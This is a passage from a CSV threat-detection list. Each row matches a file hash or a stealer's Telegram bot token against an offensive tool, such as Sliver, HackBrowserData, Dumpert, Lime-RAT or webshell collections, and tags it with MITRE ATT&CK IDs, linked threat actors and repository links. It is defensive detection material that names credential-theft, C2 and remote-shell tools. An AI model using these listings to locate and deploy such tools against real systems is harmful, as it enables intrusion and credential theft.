uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","29041" "*745bdc69fd7d712f65419c126b3ab5524fb96a511a21fea2d2b261607b3b2c55*",".{0,1000}745bdc69fd7d712f65419c126b3ab5524fb96a511a21fea2d2b261607b3b2c55.{0,1000}","offensive_tool_keyword","LostMyPassword","Nirsoft tool that allows you to recover a lost password if it's stored by a software installed on your system","T1040 - T1003 - T1078 - T1518 - T1555","TA0006 - TA0009 ","N/A","LockBit","Credential Access","https://www.nirsoft.net/alpha/lostmypassword-x64.zip","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","29042" "*745d105a0ce33f13d32c65e383e0c8a3e2446b5d279008fe1665737bbc8a6b18*",".{0,1000}745d105a0ce33f13d32c65e383e0c8a3e2446b5d279008fe1665737bbc8a6b18.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29043" "*7460daaecb43751385fc4ec001ac2496d9d8041ccafbef3793262644f500baf6*",".{0,1000}7460daaecb43751385fc4ec001ac2496d9d8041ccafbef3793262644f500baf6.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability 
Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","29044" "*746726f4bb20bc303db072b0496a69e91b409285bad1c5507d1969ef19d27380*",".{0,1000}746726f4bb20bc303db072b0496a69e91b409285bad1c5507d1969ef19d27380.{0,1000}","offensive_tool_keyword","ROADtoken","Abusing Azure AD SSO with the Primary Refresh Token - ROADtoken is a tool that uses the BrowserCore.exe binary to obtain a cookie that can be used with SSO and Azure AD","T1557 - T1078 - T1071.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/dirkjanm/ROADtoken","1","0","#filehash","N/A","7","1","89","17","2020-09-30T16:18:47Z","2020-07-21T12:42:14Z","29045" "*746c0a01b163c57f729738cfe39c1c83d0b938aa48f07d1f866c1b8adaec4aa0*",".{0,1000}746c0a01b163c57f729738cfe39c1c83d0b938aa48f07d1f866c1b8adaec4aa0.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","29046" "*74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6*",".{0,1000}74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","#filehash","N/A","9","10","N/A","N/A","N/A","N/A","29047" "*7484009227:AAEvngzrIKFNFdfSqECzWAqbnB5IXk8pjVo*",".{0,1000}7484009227\:AAEvngzrIKFNFdfSqECzWAqbnB5IXk8pjVo.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from 
GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","29048" "*7498456870aa9d28a3ec5fd9bab4838bd4a0a35c2f41ac8da9116326337f8b7e*",".{0,1000}7498456870aa9d28a3ec5fd9bab4838bd4a0a35c2f41ac8da9116326337f8b7e.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","29052" "*74a30d4ca766db4424a21073abf73dff319832d6af8db37a0ec45edae12d897d*",".{0,1000}74a30d4ca766db4424a21073abf73dff319832d6af8db37a0ec45edae12d897d.{0,1000}","offensive_tool_keyword","Credphisher","prompt a user for credentials using a Windows credential dialog","T1056.002 - T1003 ","TA0006","N/A","N/A","Credential Access","https://github.com/ryanmrestivo/red-team/blob/1e53b7aa77717a22c9bd54facc64155a9a4c49fc/Exploitation-Tools/OffensiveCSharp/CredPhisher","1","0","#filehash","N/A","7","2","136","34","2024-10-18T12:12:38Z","2021-04-12T00:00:03Z","29053" "*74a529e953952d9830fee9a63ae5489f59ad85f22bdf07e5d3d184d07f970cfb*",".{0,1000}74a529e953952d9830fee9a63ae5489f59ad85f22bdf07e5d3d184d07f970cfb.{0,1000}","offensive_tool_keyword","Malware RAT collection","from 
Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29056" "*74ae919aa5d393c04fd5b2a8048b8df764e871f1e652099d50c5ea63fb06a2e1*",".{0,1000}74ae919aa5d393c04fd5b2a8048b8df764e871f1e652099d50c5ea63fb06a2e1.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","29057" "*74afc28bb4191086a08bf270410650a7eb9f0401192e2ae7a36cf3b6b0e992df*",".{0,1000}74afc28bb4191086a08bf270410650a7eb9f0401192e2ae7a36cf3b6b0e992df.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","29058" "*74b2d869745f1f642e34d8f694da33eaddfb7c6e68ad9cf24bc40df90db834cb*",".{0,1000}74b2d869745f1f642e34d8f694da33eaddfb7c6e68ad9cf24bc40df90db834cb.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29059" "*74b7b34bd0a221eaaf383ef8a38f41f466166c6184d6586f510cf509e9e52f0d*",".{0,1000}74b7b34bd0a221eaaf383ef8a38f41f466166c6184d6586f510cf509e9e52f0d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous 
webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29061" "*74b8858250ad0401708fc5f45650d57ce5fef0a6ab9d190ad384997e3bb794fd*",".{0,1000}74b8858250ad0401708fc5f45650d57ce5fef0a6ab9d190ad384997e3bb794fd.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#filehash","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","29062" "*74bc640c2f33875dab29328c3f49dce2658a4b77a38612f11a14c4c100ba8cb6*",".{0,1000}74bc640c2f33875dab29328c3f49dce2658a4b77a38612f11a14c4c100ba8cb6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29063" "*74c46a8cf10e17f507701a84dc429eb7a7a276f0d8e15b4026a3242a1bc0a625*",".{0,1000}74c46a8cf10e17f507701a84dc429eb7a7a276f0d8e15b4026a3242a1bc0a625.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29064" "*74c63668a8b03c046dcb1293ccffd2e0f7b4dd22210a4faff3d29a0db5761d20*",".{0,1000}74c63668a8b03c046dcb1293ccffd2e0f7b4dd22210a4faff3d29a0db5761d20.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","29066" "*74cab90c0b8c811550b25a010382685337a64086ff2a7b20fd7b5c29c80c8580*",".{0,1000}74cab90c0b8c811550b25a010382685337a64086ff2a7b20fd7b5c29c80c8580.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29067" "*74da983c63f4c77eafcd9953c0705f01e2dfcc30a14fded06ff1e2641b8ea856*",".{0,1000}74da983c63f4c77eafcd9953c0705f01e2dfcc30a14fded06ff1e2641b8ea856.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). 
It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","29071" "*74dca5fb9ded47dcf5fb0d1a40dc68081e04c3f1fb66653abd671b39f3adb940*",".{0,1000}74dca5fb9ded47dcf5fb0d1a40dc68081e04c3f1fb66653abd671b39f3adb940.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","29072" "*74e099d670bb7ddfbc574029735758bdd1e0abd82f7ab428fe2118a8459328c0*",".{0,1000}74e099d670bb7ddfbc574029735758bdd1e0abd82f7ab428fe2118a8459328c0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29075" "*74e35d9c8f14042101ba70a5754c800de149c83d5ddfd2303f99fff92f7b4d7c*",".{0,1000}74e35d9c8f14042101ba70a5754c800de149c83d5ddfd2303f99fff92f7b4d7c.{0,1000}","offensive_tool_keyword","Bat-Potato","Automating Juicy Potato Local Privilege Escalation CMD exploit for penetration testers","T1055.012 - T1068 - T1548.002 - 
T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/0x4xel/Bat-Potato","1","0","#filehash","N/A","10","1","42","11","2022-12-13T20:19:51Z","2022-12-12T20:50:22Z","29076" "*74f0a367e0af7a5885ece4682a8e1a07945893090ecf8c9677310954c7d9c479*",".{0,1000}74f0a367e0af7a5885ece4682a8e1a07945893090ecf8c9677310954c7d9c479.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#filehash","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","29077" "*74f34d98822c40027fa388f51791cec58f2bf71c47936616eca08489a4493f61*",".{0,1000}74f34d98822c40027fa388f51791cec58f2bf71c47936616eca08489a4493f61.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","0","#filehash","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","29078" "*74f93a2398222f802089239c9610a21ea5ff34fb81cf6869f58bf5782ea5127f*",".{0,1000}74f93a2398222f802089239c9610a21ea5ff34fb81cf6869f58bf5782ea5127f.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","29079" "*74fd341390aaee0b7dac4f892df392eadb934932bf7e6d6047ffcc8532df1f3d*",".{0,1000}74fd341390aaee0b7dac4f892df392eadb934932bf7e6d6047ffcc8532df1f3d.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","29081" "*75007cb1974bca92234e5e178b17a429922c54676bc446d032464e358d26510a*",".{0,1000}75007cb1974bca92234e5e178b17a429922c54676bc446d032464e358d26510a.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","29082" "*7504dee72e18b91d0f759f04385a968879699c228dae9c9a2c338dc7b76f3178*",".{0,1000}7504dee72e18b91d0f759f04385a968879699c228dae9c9a2c338dc7b76f3178.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29083" "*750674fbade92a723934ce273d69fb1000374997c7f19e7a5368916bd277ba00*",".{0,1000}750674fbade92a723934ce273d69fb1000374997c7f19e7a5368916bd277ba00.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","29084" "*7506b958b82c26e3c9a5f11c36cc63c475434e28de8bd501d2823d0decba29ab*",".{0,1000}7506b958b82c26e3c9a5f11c36cc63c475434e28de8bd501d2823d0decba29ab.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29085" 
"*750b490f1788db4c843135e409ae3175cff1be5c61246341eabdfa135ac6c7e3*",".{0,1000}750b490f1788db4c843135e409ae3175cff1be5c61246341eabdfa135ac6c7e3.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","29086" "*750de413f15ccf2befe7b1b298a3e4dcd7d226b7eb16ff4803dc4593d1faa320*",".{0,1000}750de413f15ccf2befe7b1b298a3e4dcd7d226b7eb16ff4803dc4593d1faa320.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","29087" "*751381cb88f4fc0c53f9cdfca7a4d217121eef8defb5555728101e5e7d42161b*",".{0,1000}751381cb88f4fc0c53f9cdfca7a4d217121eef8defb5555728101e5e7d42161b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29088" "*751456c943cbba46078f9443241a2b52f0dfcc47d876ec388213b4cba48ae654*",".{0,1000}751456c943cbba46078f9443241a2b52f0dfcc47d876ec388213b4cba48ae654.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - 
T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","29089" "*75216b97bd835abddaadc142f709b03fa70a513d3c37fa9a013ecb9536a92bb4*",".{0,1000}75216b97bd835abddaadc142f709b03fa70a513d3c37fa9a013ecb9536a92bb4.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29091" "*752b696841027c3767aa5d6582c03111e7fe0ab05f63905313ae7ce089e8e584*",".{0,1000}752b696841027c3767aa5d6582c03111e7fe0ab05f63905313ae7ce089e8e584.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#filehash","N/A","10","9","N/A","N/A","N/A","N/A","29093" "*752c9bc83cd57649bece5f5885d921fa0dfd8cb62df66b6db1df281e51cdb560*",".{0,1000}752c9bc83cd57649bece5f5885d921fa0dfd8cb62df66b6db1df281e51cdb560.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","29094" "*7531c23a8951439bfea1349ac6ad30a9bc5c1269718aaa7e320986a32cd05d30*",".{0,1000}7531c23a8951439bfea1349ac6ad30a9bc5c1269718aaa7e320986a32cd05d30.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel 
over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29095" "*75374c3f9c0ddde44a47e4a780f2ee779e2a1350d8cbea052708b20cdd289599*",".{0,1000}75374c3f9c0ddde44a47e4a780f2ee779e2a1350d8cbea052708b20cdd289599.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29098" "*75389828365fcfac51834295aa9acffcd676181fbcee6301f1963662b6666407*",".{0,1000}75389828365fcfac51834295aa9acffcd676181fbcee6301f1963662b6666407.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29099" "*754ee0df79ed4346a364bb049f2fd1876287132af5d90a872d2de4dbe53c3c47*",".{0,1000}754ee0df79ed4346a364bb049f2fd1876287132af5d90a872d2de4dbe53c3c47.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - 
Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29102" "*754f258d13d79689b39e46650ccdfbd876e8b2edb945ad5d749789b5161f0ff5*",".{0,1000}754f258d13d79689b39e46650ccdfbd876e8b2edb945ad5d749789b5161f0ff5.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29103" "*75574959bbdad4b4ac7b16906cd8f1fd855d2a7df8e63905ab18540e2d6f1600*",".{0,1000}75574959bbdad4b4ac7b16906cd8f1fd855d2a7df8e63905ab18540e2d6f1600.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","29104" "*755c1d8c2e4d58422ec4da20479b10857e1e556331af09975929d13b6b5cbd53*",".{0,1000}755c1d8c2e4d58422ec4da20479b10857e1e556331af09975929d13b6b5cbd53.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","29105" "*755dfa63130b4daa2098ee3253b0532cf2bd5307e9036fa3cec74f9755b79601*",".{0,1000}755dfa63130b4daa2098ee3253b0532cf2bd5307e9036fa3cec74f9755b79601.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - 
T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","29106" "*75682eac28a36100019a0606879be2a615e6c221b212833b2eb9ab83f6360cd6*",".{0,1000}75682eac28a36100019a0606879be2a615e6c221b212833b2eb9ab83f6360cd6.{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","0","#filehash","N/A","8","2","124","22","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z","29107" "*757c6b973f06e169ec2346c818f211559a084fd2adaed2e0e9e232541b62b557*",".{0,1000}757c6b973f06e169ec2346c818f211559a084fd2adaed2e0e9e232541b62b557.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","0","#filehash","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","29108" 